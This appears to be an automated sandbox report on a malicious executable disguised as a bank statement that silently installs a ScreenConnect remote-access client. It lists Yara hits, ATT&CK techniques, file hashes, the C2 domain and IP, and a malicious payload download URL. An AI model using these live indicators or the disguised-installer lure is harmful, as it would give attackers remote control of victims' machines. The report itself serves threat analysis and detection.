                              Source: Yara matchFile source: 0.2.2024-11 eStmt 5563019.exe.5860000.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.2024-11 eStmt 5563019.exe.5c63d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.2024-11 eStmt 5563019.exe.5860000.5.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.2024-11 eStmt 5563019.exe.67024c.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.25ff8c0.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.2024-11 eStmt 5563019.exe.5b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1729022620.0000000005860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1715569033.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.1808808896.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 2024-11 eStmt 5563019.exe PID: 7688, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7880, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8128, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7284, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\6153c6.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI5684.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Replication Through Removable Media
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              1
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              2
                              Windows Service
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              13
                              Process Injection
                              1
                              Timestomp
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              DLL Search Order Hijacking
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              File Deletion
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt122
                              Masquerading
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
                              Virtualization/Sandbox Evasion
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Hidden Users
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Bootkit
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Rundll32
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560600 Sample: 2024-11 eStmt 5563019.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 46 55 bw36back93.site 2->55 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 71 5 other signatures 2->71 8 ScreenConnect.ClientService.exe 2 5 2->8         started        12 msiexec.exe 93 51 2->12         started        15 2024-11 eStmt 5563019.exe 5 2->15         started        signatures3 process4 dnsIp5 57 bw36back93.site 176.123.1.130, 49731, 8880 ALEXHOSTMD Moldova Republic of 8->57 73 Reads the Security eventlog 8->73 75 Reads the System eventlog 8->75 17 ScreenConnect.WindowsClient.exe 3 8->17         started        20 ScreenConnect.WindowsClient.exe 2 8->20         started        35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 12->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 12->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 12->39 dropped 43 9 other files (1 malicious) 12->43 dropped 77 Enables network access during safeboot for specific services 12->77 22 msiexec.exe 12->22         started        24 msiexec.exe 1 12->24         started        26 msiexec.exe 12->26         started        41 C:\Users\...\2024-11 eStmt 5563019.exe.log, CSV 15->41 dropped 79 Contains functionality to hide user accounts 15->79 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 61 Creates files in the system32 config directory 17->61 63 Contains functionality to hide user accounts 17->63 31 rundll32.exe 8 22->31         started        45 C:\Users\user\AppData\Local\...\MSI4E28.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 Microsoft.Deployme...indowsInstaller.dll, PE32 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              2024-11 eStmt 5563019.exe25%ReversingLabsWin32.PUA.ConnectWise
                              2024-11 eStmt 5563019.exe26%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe4%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4E28.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI56A4.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI586B.tmp0%ReversingLabs
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              bw36back93.site3%VirustotalBrowse
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              bw36back93.site
                              176.123.1.130
                              truetrueunknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://wixtoolset.org/releases/Microsoft.Deployment.WindowsInstaller.dll.4.drfalse
                                high
                                http://wixtoolset.org/news/Microsoft.Deployment.WindowsInstaller.dll.4.drfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000007.00000002.2969575869.0000000002076000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808808896.0000000002A02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vMicrosoft.Deployment.WindowsInstaller.dll.4.drfalse
                                      high
                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        176.123.1.130
                                        bw36back93.siteMoldova Republic of
                                        200019ALEXHOSTMDtrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1560600
                                        Start date and time:2024-11-22 01:33:37 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:14
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:2024-11 eStmt 5563019.exe
                                        Detection:MAL
                                        Classification:mal46.evad.winEXE@17/53@1/1
                                        EGA Information:
                                        • Successful, ratio: 60%
                                        HCA Information:
                                        • Successful, ratio: 64%
                                        • Number of executed functions: 214
                                        • Number of non-executed functions: 6
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target 2024-11 eStmt 5563019.exe, PID 7688 because it is empty
                                        • Execution Graph export aborted for target rundll32.exe, PID 7880 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        No simulations
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        176.123.1.130NjINZzXcCF.exeGet hashmaliciousScreenConnect ToolBrowse
                                          TrsaYn3QG2.exeGet hashmaliciousScreenConnect ToolBrowse
                                            lQd0v7fqMj.msiGet hashmaliciousScreenConnect ToolBrowse
                                              QlIpkzApq6.msiGet hashmaliciousScreenConnect ToolBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                bw36back93.siteNjINZzXcCF.exeGet hashmaliciousScreenConnect ToolBrowse
                                                • 176.123.1.130
                                                TrsaYn3QG2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                • 176.123.1.130
                                                lQd0v7fqMj.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 176.123.1.130
                                                QlIpkzApq6.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 176.123.1.130
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ALEXHOSTMDotis.exeGet hashmaliciousUnknownBrowse
                                                • 91.132.92.231
                                                otis.exeGet hashmaliciousUnknownBrowse
                                                • 91.132.92.231
                                                armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.208.162.247
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dllorder-00908.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  q1M9Xfi0yC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    iZRt9uAa2V.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      q1M9Xfi0yC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        iZRt9uAa2V.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                                            Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                U01wqIX537.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  28unTKrjKS.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):219052
                                                                    Entropy (8bit):6.582419367181179
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qA79LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGE:d7uH2aCGw1ST1wQLdqvE
                                                                    MD5:4A2DA03114D559CB756A42F108D3E1BB
                                                                    SHA1:9CB2D51D5E0723F32E6B685B92B1B0BCBCAEC2D5
                                                                    SHA-256:7ED0A0473FFD4A7572D4D3B056F3E217381BDE3765427A2EF5E5C865CEF675F9
                                                                    SHA-512:6FDA0FB9DF5CC98AFC88DF1B23D62DF27070B9ADC3A8D49CC2AF797AEAB62D5C1E3B16AAA4D40110531E7071A7FC57525100D02D025624701ACD454E5DA39B3D
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\6153c6.rbs, Author: Joe Security
                                                                    Reputation:low
                                                                    Preview:...@IXOS.@.....@R.uY.@.....@.....@.....@.....@.....@......&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}'.ScreenConnect Client (d519fd2fdcfe66e7)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d519fd2fdcfe66e7)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{A15400AF-0154-8531-03AA-3964C8AD50B4}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@......&.{8F5BA9AE-CC90-EF21-D44F-0DBE1F85167E}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@......&.{05055D85-C9E6-4F6B-54D0-EB3AE0D12F70}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@......&.{9DF6162C-692E-B1AB-F5C9-E3E6D24784B5}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@......&.{59F265F7-E0E9-395B-C6BD-777B5EB5781C}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@......&.{8E895DEB-25A8-A825-78CE-D211440F5F31}&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.@....
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):762
                                                                    Entropy (8bit):4.5491067620977805
                                                                    Encrypted:false
                                                                    SSDEEP:12:rHy2DLI4MWojmK7iV1ItfU49cAjUPDLS184c7uMUGia84c7eAi5TlO5FMDj0wca2:zHE4yY4M2xjU7w8LS038LD4TlcFq3aIA
                                                                    MD5:B09DFE9FEF5BDAD50AED0C5C81A7F8B8
                                                                    SHA1:0FE2ACB83A8D66156E3F8AFE10963C3878A9C8D4
                                                                    SHA-256:39A6456F828160E9F1D49DF496143A3D83401478B0B9DFD18B66D1F44628AA73
                                                                    SHA-512:C5709D3CB1379ACCCFF12A19CA42B3B696F2266AA94792B011ACD7658EB319C8EF6DF5019F83D8759F1E19DB9D4492582794739C185BD691D7C84493F7390BFB
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.../>>..4..2...n_Q2T}........K...Z...5.......z...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....^E.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.D.e.s.c.r.i.p.t.i.o.n.G...RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.I...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.w.....Support..Support.3Software is Updating..Do not turn off your computer...,Not enough data receiving from host computer..Support
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):18414
                                                                    Entropy (8bit):7.8409431994154595
                                                                    Encrypted:false
                                                                    SSDEEP:384:r0N78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74K:64Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4BsK
                                                                    MD5:1A9CE086DC257D884E31D884D8C138F1
                                                                    SHA1:83DE5729EB3E524986F18F5144490FD2DE9A8377
                                                                    SHA-256:8D0D89B5CBCBFC3C4EAC7B05EC6A4EB018388E8022D033524B6317BB53C8D56F
                                                                    SHA-512:8CA7783AF9C4C143178587AC0B6928D6D7E37F8B4B2176A34BB4F76415F492286736B2AE8D8E555BB3CEFC103FE816D98FA1296D6BF8DDC094F6AB0D6C85F2D1
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF..../._.ks`.k.`.k.M6p-.......'.......w.......P.......\..."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..;..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..E.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48951
                                                                    Entropy (8bit):4.764447249091755
                                                                    Encrypted:false
                                                                    SSDEEP:768:jjhcIEFtl7CWQNzSB3CFLI0pDplrd5UVXWFhj39CwWLVhuK81htvrKetEpGcWITc:jjhcpFt9QNzi3CFLI0Vplrd5UVXWFhjF
                                                                    MD5:3E83A3AA62C5FF54ED98E27B3FBECF90
                                                                    SHA1:96D8927C870A74A478864240B3ACE94AD543DFB8
                                                                    SHA-256:2D88B97D28BE01ABCA4544C6381A4370C1A1CE05142C176742F13B44889DDF90
                                                                    SHA-512:EA9D05A4AA1EE5CCCC61C4F5E8994EFBA9EFFF0549B69577BEF1F2A22CCE908739124EFF1E0DB5CFDD69E077AD2D7CDB1307DE92D79673C9309EE621CB139956
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I..-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..........5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z....V".........
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):26722
                                                                    Entropy (8bit):7.7401940386372345
                                                                    Encrypted:false
                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):192512
                                                                    Entropy (8bit):6.5759745825926155
                                                                    Encrypted:false
                                                                    SSDEEP:3072:NfVfH24qg0+UkqVk9kkkkkkHEkkkNikkAkkkkkkkkpkkAkKMi7stGzHqcyzdWFDm:H+a0+UkqVk9kkkkkkHEkkkNikkAkkkku
                                                                    MD5:6BC9611D5B6CEE698149A18D986547A8
                                                                    SHA1:F36AB74E4E502FDAF81E101836B94C91D80CB8EA
